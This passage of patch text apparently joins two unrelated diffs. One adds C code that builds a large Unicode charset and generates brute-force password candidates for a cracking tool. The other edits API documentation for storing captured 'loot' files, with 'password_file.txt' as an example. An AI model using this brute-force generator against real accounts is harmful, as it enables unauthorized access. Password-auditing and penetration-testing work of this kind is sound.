+	while (c <= 0x11d65)	// ..to GUNJALA GONDI LETTER UU
+		charset[i++] = c++;
+	charset[i++] = 0x11d67;	// GUNJALA GONDI LETTER EE
+	charset[i++] = 0x11d68;	// GUNJALA GONDI LETTER AI
+	c = 0x11d6a;		// from GUNJALA GONDI LETTER OO
+	while (c <= 0x11d8e)	// ..to GUNJALA GONDI VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0x11d90;	// GUNJALA GONDI VOWEL SIGN EE
+	charset[i++] = 0x11d91;	// GUNJALA GONDI VOWEL SIGN AI
+	c = 0x11d93;		// from GUNJALA GONDI VOWEL SIGN OO
+	while (c <= 0x11d98)	// ..to GUNJALA GONDI OM
+		charset[i++] = c++;
+	c = 0x11da0;		// from GUNJALA GONDI DIGIT ZERO
+	while (c <= 0x11da9)	// ..to GUNJALA GONDI DIGIT NINE
+		charset[i++] = c++;
+// 11EE0..11EFF; Makasar
+	c = 0x11ee0;		// from MAKASAR LETTER KA
+	while (c <= 0x11ef8)	// ..to MAKASAR END OF SECTION
+		charset[i++] = c++;
+// 12000..123FF; Cuneiform
+	c = 0x12000;		// from CUNEIFORM SIGN A
+	while (c <= 0x12399)	// ..to CUNEIFORM SIGN U U
+		charset[i++] = c++;
+// 12400..1247F; Cuneiform Numbers and Punctuation
+	c = 0x12400;		// from CUNEIFORM NUMERIC SIGN TWO ASH
+	while (c <= 0x1246e)	// ..to CUNEIFORM NUMERIC SIGN NINE U VARIANT FORM
+		charset[i++] = c++;
+	c = 0x12470;		// from CUNEIFORM PUNCTUATION SIGN OLD ASSYRIAN WORD DIVIDER
+	while (c <= 0x12474)	// ..to CUNEIFORM PUNCTUATION SIGN DIAGONAL QUADCOLON
+		charset[i++] = c++;
+// 12480..1254F; Early Dynastic Cuneiform
+	c = 0x12480;		// from CUNEIFORM SIGN AB TIMES NUN TENU
+	while (c <= 0x12543)	// ..to CUNEIFORM SIGN ZU5 TIMES THREE DISH TENU
+		charset[i++] = c++;
+// 13000..1342F; Egyptian Hieroglyphs
+	c = 0x13000;		// from EGYPTIAN HIEROGLYPH A001
+	while (c <= 0x1342e)	// ..to EGYPTIAN HIEROGLYPH AA032
+		charset[i++] = c++;
+// 14400..1467F; Anatolian Hieroglyphs
+	c = 0x14400;		// from ANATOLIAN HIEROGLYPH A001
+	while (c <= 0x14646)	// ..to ANATOLIAN HIEROGLYPH A530
+		charset[i++] = c++;
+// 16800..16A3F; Bamum Supplement
+	c = 0x16800;		// from BAMUM LETTER PHASE-A NGKUE MFON
+	while (c <= 0x16a38)	// ..to BAMUM LETTER PHASE-F VUEQ
+		charset[i++] = c++;
+// 16A40..16A6F; Mro
+	c = 0x16a40;		// from MRO LETTER TA
+	while (c <= 0x16a5e)	// ..to MRO LETTER TEK
+		charset[i++] = c++;
+	c = 0x16a60;		// from MRO DIGIT ZERO
+	while (c <= 0x16a69)	// ..to MRO DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x16a6e;	// MRO DANDA
+	charset[i++] = 0x16a6f;	// MRO DOUBLE DANDA
+// 16AD0..16AFF; Bassa Vah
+	c = 0x16ad0;		// from BASSA VAH LETTER ENNI
+	while (c <= 0x16aed)	// ..to BASSA VAH LETTER I
+		charset[i++] = c++;
+	c = 0x16af0;		// from BASSA VAH COMBINING HIGH TONE
+	while (c <= 0x16af5)	// ..to BASSA VAH FULL STOP
+		charset[i++] = c++;
+// 16B00..16B8F; Pahawh Hmong
+	c = 0x16b00;		// from PAHAWH HMONG VOWEL KEEB
+	while (c <= 0x16b45)	// ..to PAHAWH HMONG SIGN CIM TSOV ROG
+		charset[i++] = c++;
+	c = 0x16b50;		// from PAHAWH HMONG DIGIT ZERO
+	while (c <= 0x16b59)	// ..to PAHAWH HMONG DIGIT NINE
+		charset[i++] = c++;
+	c = 0x16b5b;		// from PAHAWH HMONG NUMBER TENS
+	while (c <= 0x16b61)	// ..to PAHAWH HMONG NUMBER TRILLIONS
+		charset[i++] = c++;
+	c = 0x16b63;		// from PAHAWH HMONG SIGN VOS LUB
+	while (c <= 0x16b77)	// ..to PAHAWH HMONG SIGN CIM NRES TOS
+		charset[i++] = c++;
+	c = 0x16b7d;		// from PAHAWH HMONG CLAN SIGN TSHEEJ
+	while (c <= 0x16b8f)	// ..to PAHAWH HMONG CLAN SIGN VWJ
+		charset[i++] = c++;
+// 16E40..16E9F; Medefaidrin
+	c = 0x16e40;		// from MEDEFAIDRIN CAPITAL LETTER M
+	while (c <= 0x16e9a)	// ..to MEDEFAIDRIN EXCLAMATION OH
+		charset[i++] = c++;
+// 16F00..16F9F; Miao
+	c = 0x16f00;		// from MIAO LETTER PA
+	while (c <= 0x16f44)	// ..to MIAO LETTER HHA
+		charset[i++] = c++;
+	c = 0x16f50;		// from MIAO LETTER NASALIZATION
+	while (c <= 0x16f7e)	// ..to MIAO VOWEL SIGN NG
+		charset[i++] = c++;
+	c = 0x16f8f;		// from MIAO TONE RIGHT
+	while (c <= 0x16f9f)	// ..to MIAO LETTER REFORMED TONE-8
+		charset[i++] = c++;
+// 16FE0..16FFF; Ideographic Symbols and Punctuation
+	charset[i++] = 0x16fe0;	// TANGUT ITERATION MARK
+	charset[i++] = 0x16fe1;	// NUSHU ITERATION MARK
+// 17000..187FF; Tangut
+	c = 0x17000;		// from <Tangut Ideograph, First>
+	while (c <= 0x187f1)	// ..to <Tangut Ideograph, Last>
+		charset[i++] = c++;
+// 18800..18AFF; Tangut Components
+	c = 0x18800;		// from TANGUT COMPONENT-001
+	while (c <= 0x18af2)	// ..to TANGUT COMPONENT-755
+		charset[i++] = c++;
+// 1B000..1B0FF; Kana Supplement
+	c = 0x1b000;		// from KATAKANA LETTER ARCHAIC E
+	while (c <= 0x1b0ff)	// ..to HENTAIGANA LETTER RE-2
+		charset[i++] = c++;
+// 1B100..1B12F; Kana Extended-A
+	c = 0x1b100;		// from HENTAIGANA LETTER RE-3
+	while (c <= 0x1b11e)	// ..to HENTAIGANA LETTER N-MU-MO-2
+		charset[i++] = c++;
+// 1B170..1B2FF; Nushu
+	c = 0x1b170;		// from NUSHU CHARACTER-1B170
+	while (c <= 0x1b2fb)	// ..to NUSHU CHARACTER-1B2FB
+		charset[i++] = c++;
+// 1BC00..1BC9F; Duployan
+	c = 0x1bc00;		// from DUPLOYAN LETTER H
+	while (c <= 0x1bc6a)	// ..to DUPLOYAN LETTER VOCALIC M
+		charset[i++] = c++;
+	c = 0x1bc70;		// from DUPLOYAN AFFIX LEFT HORIZONTAL SECANT
+	while (c <= 0x1bc7c)	// ..to DUPLOYAN AFFIX ATTACHED TANGENT HOOK
+		charset[i++] = c++;
+	c = 0x1bc80;		// from DUPLOYAN AFFIX HIGH ACUTE
+	while (c <= 0x1bc88)	// ..to DUPLOYAN AFFIX HIGH VERTICAL
+		charset[i++] = c++;
+	c = 0x1bc90;		// from DUPLOYAN AFFIX LOW ACUTE
+	while (c <= 0x1bc99)	// ..to DUPLOYAN AFFIX LOW ARROW
+		charset[i++] = c++;
+	c = 0x1bc9c;		// from DUPLOYAN SIGN O WITH CROSS
+	while (c <= 0x1bc9f)	// ..to DUPLOYAN PUNCTUATION CHINOOK FULL STOP
+		charset[i++] = c++;
+// 1BCA0..1BCAF; Shorthand Format Controls
+	c = 0x1bca0;		// from SHORTHAND FORMAT LETTER OVERLAP
+	while (c <= 0x1bca3)	// ..to SHORTHAND FORMAT UP STEP
+		charset[i++] = c++;
+// 1D000..1D0FF; Byzantine Musical Symbols
+	c = 0x1d000;		// from BYZANTINE MUSICAL SYMBOL PSILI
+	while (c <= 0x1d0f5)	// ..to BYZANTINE MUSICAL SYMBOL GORGON NEO KATO
+		charset[i++] = c++;
+// 1D100..1D1FF; Musical Symbols
+	c = 0x1d100;		// from MUSICAL SYMBOL SINGLE BARLINE
+	while (c <= 0x1d126)	// ..to MUSICAL SYMBOL DRUM CLEF-2
+		charset[i++] = c++;
+	c = 0x1d129;		// from MUSICAL SYMBOL MULTIPLE MEASURE REST
+	while (c <= 0x1d1e8)	// ..to MUSICAL SYMBOL KIEVAN FLAT SIGN
+		charset[i++] = c++;
+// 1D200..1D24F; Ancient Greek Musical Notation
+	c = 0x1d200;		// from GREEK VOCAL NOTATION SYMBOL-1
+	while (c <= 0x1d245)	// ..to GREEK MUSICAL LEIMMA
+		charset[i++] = c++;
+// 1D2E0..1D2FF; Mayan Numerals
+	c = 0x1d2e0;		// from MAYAN NUMERAL ZERO
+	while (c <= 0x1d2f3)	// ..to MAYAN NUMERAL NINETEEN
+		charset[i++] = c++;
+// 1D300..1D35F; Tai Xuan Jing Symbols
+	c = 0x1d300;		// from MONOGRAM FOR EARTH
+	while (c <= 0x1d356)	// ..to TETRAGRAM FOR FOSTERING
+		charset[i++] = c++;
+// 1D360..1D37F; Counting Rod Numerals
+	c = 0x1d360;		// from COUNTING ROD UNIT DIGIT ONE
+	while (c <= 0x1d378)	// ..to TALLY MARK FIVE
+		charset[i++] = c++;
+// 1D400..1D7FF; Mathematical Alphanumeric Symbols
+	c = 0x1d400;		// from MATHEMATICAL BOLD CAPITAL A
+	while (c <= 0x1d454)	// ..to MATHEMATICAL ITALIC SMALL G
+		charset[i++] = c++;
+	c = 0x1d456;		// from MATHEMATICAL ITALIC SMALL I
+	while (c <= 0x1d49c)	// ..to MATHEMATICAL SCRIPT CAPITAL A
+		charset[i++] = c++;
+	charset[i++] = 0x1d49e;	// MATHEMATICAL SCRIPT CAPITAL C
+	charset[i++] = 0x1d49f;	// MATHEMATICAL SCRIPT CAPITAL D
+	charset[i++] = 0x1d4a5;	// MATHEMATICAL SCRIPT CAPITAL J
+	charset[i++] = 0x1d4a6;	// MATHEMATICAL SCRIPT CAPITAL K
+	c = 0x1d4a9;		// from MATHEMATICAL SCRIPT CAPITAL N
+	while (c <= 0x1d4ac)	// ..to MATHEMATICAL SCRIPT CAPITAL Q
+		charset[i++] = c++;
+	c = 0x1d4ae;		// from MATHEMATICAL SCRIPT CAPITAL S
+	while (c <= 0x1d4b9)	// ..to MATHEMATICAL SCRIPT SMALL D
+		charset[i++] = c++;
+	c = 0x1d4bd;		// from MATHEMATICAL SCRIPT SMALL H
+	while (c <= 0x1d4c3)	// ..to MATHEMATICAL SCRIPT SMALL N
+		charset[i++] = c++;
+	c = 0x1d4c5;		// from MATHEMATICAL SCRIPT SMALL P
+	while (c <= 0x1d505)	// ..to MATHEMATICAL FRAKTUR CAPITAL B
+		charset[i++] = c++;
+	c = 0x1d507;		// from MATHEMATICAL FRAKTUR CAPITAL D
+	while (c <= 0x1d50a)	// ..to MATHEMATICAL FRAKTUR CAPITAL G
+		charset[i++] = c++;
+	c = 0x1d50d;		// from MATHEMATICAL FRAKTUR CAPITAL J
+	while (c <= 0x1d514)	// ..to MATHEMATICAL FRAKTUR CAPITAL Q
+		charset[i++] = c++;
+	c = 0x1d516;		// from MATHEMATICAL FRAKTUR CAPITAL S
+	while (c <= 0x1d51c)	// ..to MATHEMATICAL FRAKTUR CAPITAL Y
+		charset[i++] = c++;
+	c = 0x1d51e;		// from MATHEMATICAL FRAKTUR SMALL A
+	while (c <= 0x1d539)	// ..to MATHEMATICAL DOUBLE-STRUCK CAPITAL B
+		charset[i++] = c++;
+	c = 0x1d53b;		// from MATHEMATICAL DOUBLE-STRUCK CAPITAL D
+	while (c <= 0x1d53e)	// ..to MATHEMATICAL DOUBLE-STRUCK CAPITAL G
+		charset[i++] = c++;
+	c = 0x1d540;		// from MATHEMATICAL DOUBLE-STRUCK CAPITAL I
+	while (c <= 0x1d544)	// ..to MATHEMATICAL DOUBLE-STRUCK CAPITAL M
+		charset[i++] = c++;
+	c = 0x1d54a;		// from MATHEMATICAL DOUBLE-STRUCK CAPITAL S
+	while (c <= 0x1d550)	// ..to MATHEMATICAL DOUBLE-STRUCK CAPITAL Y
+		charset[i++] = c++;
+	c = 0x1d552;		// from MATHEMATICAL DOUBLE-STRUCK SMALL A
+	while (c <= 0x1d6a5)	// ..to MATHEMATICAL ITALIC SMALL DOTLESS J
+		charset[i++] = c++;
+	c = 0x1d6a8;		// from MATHEMATICAL BOLD CAPITAL ALPHA
+	while (c <= 0x1d7cb)	// ..to MATHEMATICAL BOLD SMALL DIGAMMA
+		charset[i++] = c++;
+	c = 0x1d7ce;		// from MATHEMATICAL BOLD DIGIT ZERO
+	while (c <= 0x1d7ff)	// ..to MATHEMATICAL MONOSPACE DIGIT NINE
+		charset[i++] = c++;
+// 1D800..1DAAF; Sutton SignWriting
+	c = 0x1d800;		// from SIGNWRITING HAND-FIST INDEX
+	while (c <= 0x1da8b)	// ..to SIGNWRITING PARENTHESIS
+		charset[i++] = c++;
+	c = 0x1da9b;		// from SIGNWRITING FILL MODIFIER-2
+	while (c <= 0x1da9f)	// ..to SIGNWRITING FILL MODIFIER-6
+		charset[i++] = c++;
+	c = 0x1daa1;		// from SIGNWRITING ROTATION MODIFIER-2
+	while (c <= 0x1daaf)	// ..to SIGNWRITING ROTATION MODIFIER-16
+		charset[i++] = c++;
+// 1E000..1E02F; Glagolitic Supplement
+	c = 0x1e000;		// from COMBINING GLAGOLITIC LETTER AZU
+	while (c <= 0x1e006)	// ..to COMBINING GLAGOLITIC LETTER ZHIVETE
+		charset[i++] = c++;
+	c = 0x1e008;		// from COMBINING GLAGOLITIC LETTER ZEMLJA
+	while (c <= 0x1e018)	// ..to COMBINING GLAGOLITIC LETTER HERU
+		charset[i++] = c++;
+	c = 0x1e01b;		// from COMBINING GLAGOLITIC LETTER SHTA
+	while (c <= 0x1e021)	// ..to COMBINING GLAGOLITIC LETTER YATI
+		charset[i++] = c++;
+	charset[i++] = 0x1e023;	// COMBINING GLAGOLITIC LETTER YU
+	charset[i++] = 0x1e024;	// COMBINING GLAGOLITIC LETTER SMALL YUS
+	c = 0x1e026;		// from COMBINING GLAGOLITIC LETTER YO
+	while (c <= 0x1e02a)	// ..to COMBINING GLAGOLITIC LETTER FITA
+		charset[i++] = c++;
+// 1E800..1E8DF; Mende Kikakui
+	c = 0x1e800;		// from MENDE KIKAKUI SYLLABLE M001 KI
+	while (c <= 0x1e8c4)	// ..to MENDE KIKAKUI SYLLABLE M060 NYON
+		charset[i++] = c++;
+	c = 0x1e8c7;		// from MENDE KIKAKUI DIGIT ONE
+	while (c <= 0x1e8d6)	// ..to MENDE KIKAKUI COMBINING NUMBER MILLIONS
+		charset[i++] = c++;
+// 1E900..1E95F; Adlam
+	c = 0x1e900;		// from ADLAM CAPITAL LETTER ALIF
+	while (c <= 0x1e94a)	// ..to ADLAM NUKTA
+		charset[i++] = c++;
+	c = 0x1e950;		// from ADLAM DIGIT ZERO
+	while (c <= 0x1e959)	// ..to ADLAM DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x1e95e;	// ADLAM INITIAL EXCLAMATION MARK
+	charset[i++] = 0x1e95f;	// ADLAM INITIAL QUESTION MARK
+// 1EC70..1ECBF; Indic Siyaq Numbers
+	c = 0x1ec71;		// from INDIC SIYAQ NUMBER ONE
+	while (c <= 0x1ecb4)	// ..to INDIC SIYAQ ALTERNATE LAKH MARK
+		charset[i++] = c++;
+// 1EE00..1EEFF; Arabic Mathematical Alphabetic Symbols
+	c = 0x1ee00;		// from ARABIC MATHEMATICAL ALEF
+	while (c <= 0x1ee03)	// ..to ARABIC MATHEMATICAL DAL
+		charset[i++] = c++;
+	c = 0x1ee05;		// from ARABIC MATHEMATICAL WAW
+	while (c <= 0x1ee1f)	// ..to ARABIC MATHEMATICAL DOTLESS QAF
+		charset[i++] = c++;
+	charset[i++] = 0x1ee21;	// ARABIC MATHEMATICAL INITIAL BEH
+	charset[i++] = 0x1ee22;	// ARABIC MATHEMATICAL INITIAL JEEM
+	c = 0x1ee29;		// from ARABIC MATHEMATICAL INITIAL YEH
+	while (c <= 0x1ee32)	// ..to ARABIC MATHEMATICAL INITIAL QAF
+		charset[i++] = c++;
+	c = 0x1ee34;		// from ARABIC MATHEMATICAL INITIAL SHEEN
+	while (c <= 0x1ee37)	// ..to ARABIC MATHEMATICAL INITIAL KHAH
+		charset[i++] = c++;
+	charset[i++] = 0x1ee4d;	// ARABIC MATHEMATICAL TAILED NOON
+	charset[i++] = 0x1ee4f;	// ARABIC MATHEMATICAL TAILED AIN
+	charset[i++] = 0x1ee51;	// ARABIC MATHEMATICAL TAILED SAD
+	charset[i++] = 0x1ee52;	// ARABIC MATHEMATICAL TAILED QAF
+	charset[i++] = 0x1ee61;	// ARABIC MATHEMATICAL STRETCHED BEH
+	charset[i++] = 0x1ee62;	// ARABIC MATHEMATICAL STRETCHED JEEM
+	c = 0x1ee67;		// from ARABIC MATHEMATICAL STRETCHED HAH
+	while (c <= 0x1ee6a)	// ..to ARABIC MATHEMATICAL STRETCHED KAF
+		charset[i++] = c++;
+	c = 0x1ee6c;		// from ARABIC MATHEMATICAL STRETCHED MEEM
+	while (c <= 0x1ee72)	// ..to ARABIC MATHEMATICAL STRETCHED QAF
+		charset[i++] = c++;
+	c = 0x1ee74;		// from ARABIC MATHEMATICAL STRETCHED SHEEN
+	while (c <= 0x1ee77)	// ..to ARABIC MATHEMATICAL STRETCHED KHAH
+		charset[i++] = c++;
+	c = 0x1ee79;		// from ARABIC MATHEMATICAL STRETCHED DAD
+	while (c <= 0x1ee7c)	// ..to ARABIC MATHEMATICAL STRETCHED DOTLESS BEH
+		charset[i++] = c++;
+	c = 0x1ee80;		// from ARABIC MATHEMATICAL LOOPED ALEF
+	while (c <= 0x1ee89)	// ..to ARABIC MATHEMATICAL LOOPED YEH
+		charset[i++] = c++;
+	c = 0x1ee8b;		// from ARABIC MATHEMATICAL LOOPED LAM
+	while (c <= 0x1ee9b)	// ..to ARABIC MATHEMATICAL LOOPED GHAIN
+		charset[i++] = c++;
+	charset[i++] = 0x1eea1;	// ARABIC MATHEMATICAL DOUBLE-STRUCK BEH
+	charset[i++] = 0x1eea3;	// ARABIC MATHEMATICAL DOUBLE-STRUCK DAL
+	c = 0x1eea5;		// from ARABIC MATHEMATICAL DOUBLE-STRUCK WAW
+	while (c <= 0x1eea9)	// ..to ARABIC MATHEMATICAL DOUBLE-STRUCK YEH
+		charset[i++] = c++;
+	c = 0x1eeab;		// from ARABIC MATHEMATICAL DOUBLE-STRUCK LAM
+	while (c <= 0x1eebb)	// ..to ARABIC MATHEMATICAL DOUBLE-STRUCK GHAIN
+		charset[i++] = c++;
+	charset[i++] = 0x1eef0;	// ARABIC MATHEMATICAL OPERATOR MEEM WITH HAH WITH TATWEEL
+	charset[i++] = 0x1eef1;	// ARABIC MATHEMATICAL OPERATOR HAH WITH DAL
+// 1F000..1F02F; Mahjong Tiles
+	c = 0x1f000;		// from MAHJONG TILE EAST WIND
+	while (c <= 0x1f02b)	// ..to MAHJONG TILE BACK
+		charset[i++] = c++;
+// 1F030..1F09F; Domino Tiles
+	c = 0x1f030;		// from DOMINO TILE HORIZONTAL BACK
+	while (c <= 0x1f093)	// ..to DOMINO TILE VERTICAL-06-06
+		charset[i++] = c++;
+// 1F0A0..1F0FF; Playing Cards
+	c = 0x1f0a0;		// from PLAYING CARD BACK
+	while (c <= 0x1f0ae)	// ..to PLAYING CARD KING OF SPADES
+		charset[i++] = c++;
+	c = 0x1f0b1;		// from PLAYING CARD ACE OF HEARTS
+	while (c <= 0x1f0bf)	// ..to PLAYING CARD RED JOKER
+		charset[i++] = c++;
+	c = 0x1f0c1;		// from PLAYING CARD ACE OF DIAMONDS
+	while (c <= 0x1f0cf)	// ..to PLAYING CARD BLACK JOKER
+		charset[i++] = c++;
+	c = 0x1f0d1;		// from PLAYING CARD ACE OF CLUBS
+	while (c <= 0x1f0f5)	// ..to PLAYING CARD TRUMP-21
+		charset[i++] = c++;
+// 1F100..1F1FF; Enclosed Alphanumeric Supplement
+	c = 0x1f100;		// from DIGIT ZERO FULL STOP
+	while (c <= 0x1f10c)	// ..to DINGBAT NEGATIVE CIRCLED SANS-SERIF DIGIT ZERO
+		charset[i++] = c++;
+	c = 0x1f110;		// from PARENTHESIZED LATIN CAPITAL LETTER A
+	while (c <= 0x1f16b)	// ..to RAISED MD SIGN
+		charset[i++] = c++;
+	c = 0x1f170;		// from NEGATIVE SQUARED LATIN CAPITAL LETTER A
+	while (c <= 0x1f1ac)	// ..to SQUARED VOD
+		charset[i++] = c++;
+	c = 0x1f1e6;		// from REGIONAL INDICATOR SYMBOL LETTER A
+	while (c <= 0x1f1ff)	// ..to REGIONAL INDICATOR SYMBOL LETTER Z
+		charset[i++] = c++;
+// 1F200..1F2FF; Enclosed Ideographic Supplement
+	charset[i++] = 0x1f200;	// SQUARE HIRAGANA HOKA
+	charset[i++] = 0x1f202;	// SQUARED KATAKANA SA
+	c = 0x1f210;		// from SQUARED CJK UNIFIED IDEOGRAPH-624B
+	while (c <= 0x1f23b)	// ..to SQUARED CJK UNIFIED IDEOGRAPH-914D
+		charset[i++] = c++;
+	c = 0x1f240;		// from TORTOISE SHELL BRACKETED CJK UNIFIED IDEOGRAPH-672C
+	while (c <= 0x1f248)	// ..to TORTOISE SHELL BRACKETED CJK UNIFIED IDEOGRAPH-6557
+		charset[i++] = c++;
+	charset[i++] = 0x1f250;	// CIRCLED IDEOGRAPH ADVANTAGE
+	charset[i++] = 0x1f251;	// CIRCLED IDEOGRAPH ACCEPT
+	c = 0x1f260;		// from ROUNDED SYMBOL FOR FU
+	while (c <= 0x1f265)	// ..to ROUNDED SYMBOL FOR CAI
+		charset[i++] = c++;
+// 1F300..1F5FF; Miscellaneous Symbols and Pictographs
+	c = 0x1f300;		// from CYCLONE
+	while (c <= 0x1f5ff)	// ..to MOYAI
+		charset[i++] = c++;
+// 1F600..1F64F; Emoticons
+	c = 0x1f600;		// from GRINNING FACE
+	while (c <= 0x1f64f)	// ..to PERSON WITH FOLDED HANDS
+		charset[i++] = c++;
+// 1F650..1F67F; Ornamental Dingbats
+	c = 0x1f650;		// from NORTH WEST POINTING LEAF
+	while (c <= 0x1f67f)	// ..to REVERSE CHECKER BOARD
+		charset[i++] = c++;
+// 1F680..1F6FF; Transport and Map Symbols
+	c = 0x1f680;		// from ROCKET
+	while (c <= 0x1f6d4)	// ..to PAGODA
+		charset[i++] = c++;
+	c = 0x1f6e0;		// from HAMMER AND WRENCH
+	while (c <= 0x1f6ec)	// ..to AIRPLANE ARRIVING
+		charset[i++] = c++;
+	c = 0x1f6f0;		// from SATELLITE
+	while (c <= 0x1f6f9)	// ..to SKATEBOARD
+		charset[i++] = c++;
+// 1F700..1F77F; Alchemical Symbols
+	c = 0x1f700;		// from ALCHEMICAL SYMBOL FOR QUINTESSENCE
+	while (c <= 0x1f773)	// ..to ALCHEMICAL SYMBOL FOR HALF OUNCE
+		charset[i++] = c++;
+// 1F780..1F7FF; Geometric Shapes Extended
+	c = 0x1f780;		// from BLACK LEFT-POINTING ISOSCELES RIGHT TRIANGLE
+	while (c <= 0x1f7d8)	// ..to NEGATIVE CIRCLED SQUARE
+		charset[i++] = c++;
+// 1F800..1F8FF; Supplemental Arrows-C
+	c = 0x1f800;		// from LEFTWARDS ARROW WITH SMALL TRIANGLE ARROWHEAD
+	while (c <= 0x1f80b)	// ..to DOWNWARDS ARROW WITH LARGE TRIANGLE ARROWHEAD
+		charset[i++] = c++;
+	c = 0x1f810;		// from LEFTWARDS ARROW WITH SMALL EQUILATERAL ARROWHEAD
+	while (c <= 0x1f847)	// ..to DOWNWARDS HEAVY ARROW
+		charset[i++] = c++;
+	c = 0x1f850;		// from LEFTWARDS SANS-SERIF ARROW
+	while (c <= 0x1f859)	// ..to UP DOWN SANS-SERIF ARROW
+		charset[i++] = c++;
+	c = 0x1f860;		// from WIDE-HEADED LEFTWARDS LIGHT BARB ARROW
+	while (c <= 0x1f887)	// ..to WIDE-HEADED SOUTH WEST VERY HEAVY BARB ARROW
+		charset[i++] = c++;
+	c = 0x1f890;		// from LEFTWARDS TRIANGLE ARROWHEAD
+	while (c <= 0x1f8ad)	// ..to WHITE ARROW SHAFT WIDTH TWO THIRDS
+		charset[i++] = c++;
+// 1F900..1F9FF; Supplemental Symbols and Pictographs
+	c = 0x1f900;		// from CIRCLED CROSS FORMEE WITH FOUR DOTS
+	while (c <= 0x1f90b)	// ..to DOWNWARD FACING NOTCHED HOOK WITH DOT
+		charset[i++] = c++;
+	c = 0x1f910;		// from ZIPPER-MOUTH FACE
+	while (c <= 0x1f93e)	// ..to HANDBALL
+		charset[i++] = c++;
+	c = 0x1f940;		// from WILTED FLOWER
+	while (c <= 0x1f970)	// ..to SMILING FACE WITH SMILING EYES AND THREE HEARTS
+		charset[i++] = c++;
+	c = 0x1f973;		// from FACE WITH PARTY HORN AND PARTY HAT
+	while (c <= 0x1f976)	// ..to FREEZING FACE
+		charset[i++] = c++;
+	c = 0x1f97c;		// from LAB COAT
+	while (c <= 0x1f9a2)	// ..to SWAN
+		charset[i++] = c++;
+	c = 0x1f9b0;		// from EMOJI COMPONENT RED HAIR
+	while (c <= 0x1f9b9)	// ..to SUPERVILLAIN
+		charset[i++] = c++;
+	charset[i++] = 0x1f9c0;	// CHEESE WEDGE
+	charset[i++] = 0x1f9c2;	// SALT SHAKER
+	c = 0x1f9d0;		// from FACE WITH MONOCLE
+	while (c <= 0x1f9ff)	// ..to NAZAR AMULET
+		charset[i++] = c++;
+// 1FA00..1FA6F; Chess Symbols
+	c = 0x1fa60;		// from XIANGQI RED GENERAL
+	while (c <= 0x1fa6d)	// ..to XIANGQI BLACK SOLDIER
+		charset[i++] = c++;
+// 20000..2A6DF; CJK Unified Ideographs Extension B
+	c = 0x20000;		// from <CJK Ideograph Extension B, First>
+	while (c <= 0x2a6d6)	// ..to <CJK Ideograph Extension B, Last>
+		charset[i++] = c++;
+// 2A700..2B73F; CJK Unified Ideographs Extension C
+	c = 0x2a700;		// from <CJK Ideograph Extension C, First>
+	while (c <= 0x2b734)	// ..to <CJK Ideograph Extension C, Last>
+		charset[i++] = c++;
+// 2B740..2B81F; CJK Unified Ideographs Extension D
+	c = 0x2b740;		// from <CJK Ideograph Extension D, First>
+	while (c <= 0x2b81d)	// ..to <CJK Ideograph Extension D, Last>
+		charset[i++] = c++;
+// 2B820..2CEAF; CJK Unified Ideographs Extension E
+	c = 0x2b820;		// from <CJK Ideograph Extension E, First>
+	while (c <= 0x2cea1)	// ..to <CJK Ideograph Extension E, Last>
+		charset[i++] = c++;
+// 2CEB0..2EBEF; CJK Unified Ideographs Extension F
+	c = 0x2ceb0;		// from <CJK Ideograph Extension F, First>
+	while (c <= 0x2ebe0)	// ..to <CJK Ideograph Extension F, Last>
+		charset[i++] = c++;
+// 2F800..2FA1F; CJK Compatibility Ideographs Supplement
+	c = 0x2f800;		// from CJK COMPATIBILITY IDEOGRAPH-2F800
+	while (c <= 0x2fa1d)	// ..to CJK COMPATIBILITY IDEOGRAPH-2FA1D
+		charset[i++] = c++;
+// E0000..E007F; Tags
+	c = 0xe0020;		// from TAG SPACE
+	while (c <= 0xe007f)	// ..to CANCEL TAG
+		charset[i++] = c++;
+// E0100..E01EF; Variation Selectors Supplement
+// F0000..FFFFF; Supplementary Private Use Area-A
+// 100000..10FFFF; Supplementary Private Use Area-B
+
+/* Zero-terminate it, and cache the first character */
+	charset[maxc = i] = 0;
+
+	length = minlength; c = 0;
+
+/* We must init word with dummy data, it doesn't get set until filter() */
+	word = 1;
+}
+
+void generate()
+{
+	int i, cl, wl;
+
+	if (target_utf8) {
+		cl = 1;
+		if (charset[c] >= 0x80) {
+			cl++;
+			if (charset[c] >= 0x0800)
+				cl++;
+			if (charset[c] >= 0x10000)
+				cl++;
+			wl = length * cl;
+			if (wl > cipher_limit) {
+				c = 0;
+				if (++length > maxlength) {
+					word = 0;
+					return;
+				}
+				cl = 1;
+				if (charset[0] >= 0x80) {
+					cl++;
+					if (charset[0] >= 0x0800)
+						cl++;
+					if (charset[0] >= 0x10000)
+						cl++;
+					wl = length * cl;
+					if (wl > cipher_limit) {
+						word = 0;
+						return;
+					}
+				}
+			}
+		}
+	}
+
+	i = 0;
+	while (i < length)
+		word[i++] = charset[c];
+	word[i] = 0;
+
+	if (++c < maxc)
+		return;
+
+	c = 0;
+	if (++length > maxlength)
+		length = 0; // Will NUL out the next "word" and thus terminate
+
+	return;
+}
+
+/* Reset length & c */
+void restore()
+{
+	length = 0;
+
+	while (word[length]) {
+		length++;
+	}
+	c = word[0];
+}
@@ -10,7 +10,8 @@ module LootApiDoc
  LTYPE_EXAMPLE = "'file', 'image', 'config_file', etc."
  PATH_DESC = 'The on-disk path to the loot file.'
  PATH_EXAMPLE = '/path/to/file.txt'
-  DATA_DESC = 'The contents of the file.'
+  DATA_DESC = "Base64 encoded copy of the file's contents."
+  DATA_EXAMPLE = 'dGhpcyBpcyB0aGUgZmlsZSdzIGNvbnRlbnRz'
  CONTENT_TYPE_DESC = 'The mime/content type of the file at {#path}.  Used to server the file correctly so browsers understand whether to render or download the file.'
  CONTENT_TYPE_EXAMPLE = 'text/plain'
  NAME_DESC = 'The name of the loot.'
@@ -18,6 +19,9 @@ module LootApiDoc
  INFO_DESC = 'Information about the loot.'
  MODULE_RUN_ID_DESC = 'The ID of the module run record this loot is associated with.'

+  # Some of the attributes expect different data when doing a create.
+  CREATE_PATH_DESC = 'The name to give the file on the server. All files are stored in a server configured path, so a full path is not needed. If there is a corresponding file on disk, the given value will be prepended with a unique string to prevent accidental overwrites of other files.'
+  CREATE_PATH_EXAMPLE = 'password_file.txt'

 # Swagger documentation for loot model
  swagger_schema :Loot do
@@ -28,7 +32,7 @@ module LootApiDoc
    property :service_id, type: :integer, format: :int32, description: SERVICE_ID_DESC
    property :ltype, type: :string, description: LTYPE_DESC, example: LTYPE_EXAMPLE
